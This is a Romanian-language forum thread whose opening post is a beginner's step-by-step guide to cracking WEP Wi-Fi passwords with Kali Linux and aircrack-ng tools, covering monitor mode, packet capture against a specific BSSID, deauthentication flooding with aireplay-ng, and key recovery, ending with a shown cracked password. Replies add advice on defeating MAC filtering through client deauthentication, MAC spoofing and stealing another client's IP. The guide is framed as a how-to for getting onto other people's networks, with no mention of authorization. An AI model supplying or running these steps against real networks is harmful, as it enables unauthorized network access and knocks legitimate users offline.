Jump to content

Recommended Posts

EXPLICATIE PENTRU PROSTI:

Ce-ti trebuie?

Kali Linux+ placa de wifi.

Personal am incercat de pe un rasp si un adaptor TL-WN722N.Kali l-a detectat direct, fara probleme.

De unde incep?

Deschid terminal, si scriu airmon-ng.Daca-mi apare ceva de genul

 

  airmon-ng

 

e de bine, am o placa wireless cu care-mi pot face treaba.A se tine cont ca e numita wlan0.

Acum scriu airmon-ng start wlan0 (sau cum e numita placa) si ar trebui sa apara asta :

 

starting wireless card

 

Daca apar mai multe procese care pot cauza probleme, de ex 2274, le puteti inchide folosind "kill 2274(PID CODE);

Next : airodump-ng mon0, pentru a vedea retelele wifi disponibile.

 

listning wireless network

 

Aici se paote vedea ca retelele cu WEP sunt mtnl, si priyan chahal

Acum scriem: airodump-ng –w mtnlcr –c 4 –bssid 0C:D2:B5:03:43:68 mon0

Dupa -w se pune un nume pentru un viitor fisier ce va fi creat, dupa -c se pune canalul, iar dupa -bssid ..bssid -ul.

Dupa ce am scris comanda, asteptam sa se trimita pachete.Un 15k ar fi destule.Daca nu se acumuleaza destule, deschizi un tab nou in care scrii : aireplay-ng -0 0 -a 0C:D2:B5:03:43:68 mon0    si vei genera mai multe pachete.

Dupa toate astea, mai ramane un singur lucru.Scrie aircrack-ng mtnlcr-01.cap

Numele este cu 01, in cazul in care este prima data cand incerci.Daca incerci iar si n-ai sters fisierul creat anterior, se va genera cu 02, 03 etc.

Cam asa a aratat rezultatul final la mine

 

13844208_1172395256135864_91901639_o.jpg

 

In cazul de mai sus, parola este : 6119500401

 

Edited by theandruala
  • Upvote 2
Link to comment
Share on other sites

On 24.7.2016 at 1:43 PM, theandruala said:

EXPLICATIE PENTRU PROSTI:

Ce-ti trebuie?

Kali Linux+ placa de wifi.

Personal am incercat de pe un rasp si un adaptor TL-WN722N.Kali l-a detectat direct, fara probleme.

De unde incep?

Deschid terminal, si scriu airmon-ng.Daca-mi apare ceva de genul

 

  airmon-ng

 

e de bine, am o placa wireless cu care-mi pot face treaba.A se tine cont ca e numita wlan0.

Acum scriu airmon-ng start wlan0 (sau cum e numita placa) si ar trebui sa apara asta :

 

starting wireless card

 

Daca apar mai multe procese care pot cauza probleme, de ex 2274, le puteti inchide folosind "kill 2274(PID CODE);

Next : airodump-ng mon0, pentru a vedea retelele wifi disponibile.

 

listning wireless network

 

Aici se paote vedea ca retelele cu WEP sunt mtnl, si priyan chahal

Acum scriem: airodump-ng –w mtnlcr –c 4 –bssid 0C:D2:B5:03:43:68 mon0

Dupa -w se pune un nume pentru un viitor fisier ce va fi creat, dupa -c se pune canalul, iar dupa -bssid ..bssid -ul.

Dupa ce am scris comanda, asteptam sa se trimita pachete.Un 15k ar fi destule.Daca nu se acumuleaza destule, deschizi un tab nou in care scrii : aireplay-ng -0 0 -a 0C:D2:B5:03:43:68 mon0    si vei genera mai multe pachete.

Dupa toate astea, mai ramane un singur lucru.Scrie aircrack-ng mtnlcr-01.cap

Numele este cu 01, in cazul in care este prima data cand incerci.Daca incerci iar si n-ai sters fisierul creat anterior, se va genera cu 02, 03 etc.

Cam asa a aratat rezultatul final la mine

 

13844208_1172395256135864_91901639_o.jpg

 

In cazul de mai sus, parola este : 6119500401

 

La ubuntu tot asa merge :) 

Link to comment
Share on other sites

11 hours ago, Mircea88 said:

Sunt mai multe fara parola decat WEP ...nu stiu pe unde locuiesti.

Stiai ca, daca , din setarile routerului faci o filtrare pe MAC sau pe IP , intro retea OPEN , e groaznic de greu sa intri ?

WEP-ul e floare la ureche ! In maxim 10 minute , daca ai client legitim conectat , ai si parola !:))

Link to comment
Share on other sites

16 hours ago, sorelian said:

Stiai ca, daca , din setarile routerului faci o filtrare pe MAC sau pe IP , intro retea OPEN , e groaznic de greu sa intri ?

WEP-ul e floare la ureche ! In maxim 10 minute , daca ai client legitim conectat , ai si parola !:))

Deauthenticate client + MAC Spoofing. Ce-i groaznic de dificil in asta?

Nu stiu exact la ce te referi cand spui filtrare pe IP. Doar daca te referi la o retea care trece printr-un firewall si nu permite trafic decat de la anumite IP-uri. Caz in care, monitorizezi putin reteaua pana gasesti un alt client ii furi IP-ul si il dai afara de pe retea. In orice caz, nu e un setup pe care ai sa-l intalnesti decat in 1% din cazuri.

 

Si WEP nu ar trebui sa iti ia mai mult de cateva minute cu sau fara client. 

 

Link to comment
Share on other sites

2 hours ago, theeternalwanderer said:

Deauthenticate client + MAC Spoofing. Ce-i groaznic de dificil in asta?

Nu stiu exact la ce te referi cand spui filtrare pe IP. Doar daca te referi la o retea care trece printr-un firewall si nu permite trafic decat de la anumite IP-uri. Caz in care, monitorizezi putin reteaua pana gasesti un alt client ii furi IP-ul si il dai afara de pe retea. In orice caz, nu e un setup pe care ai sa-l intalnesti decat in 1% din cazuri.

 

Si WEP nu ar trebui sa iti ia mai mult de cateva minute cu sau fara client. 

 

Eeeeeeeee....chestia cu groaznic se refera la situatia in care nu esti intrun linux , gen wifislax sau kali , cand nu ai la indemana cele necesare sa pui placa wireless in mod monitor.

Si vrei sa te conectezi la o retea pe care o vezi OPEN si nu merge...

 

In rest , ai dreptate , doar ca , la un WEP fara client , ai oleaca de lucru sa aduni destule IVS-uri...de la 80000 in sus.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...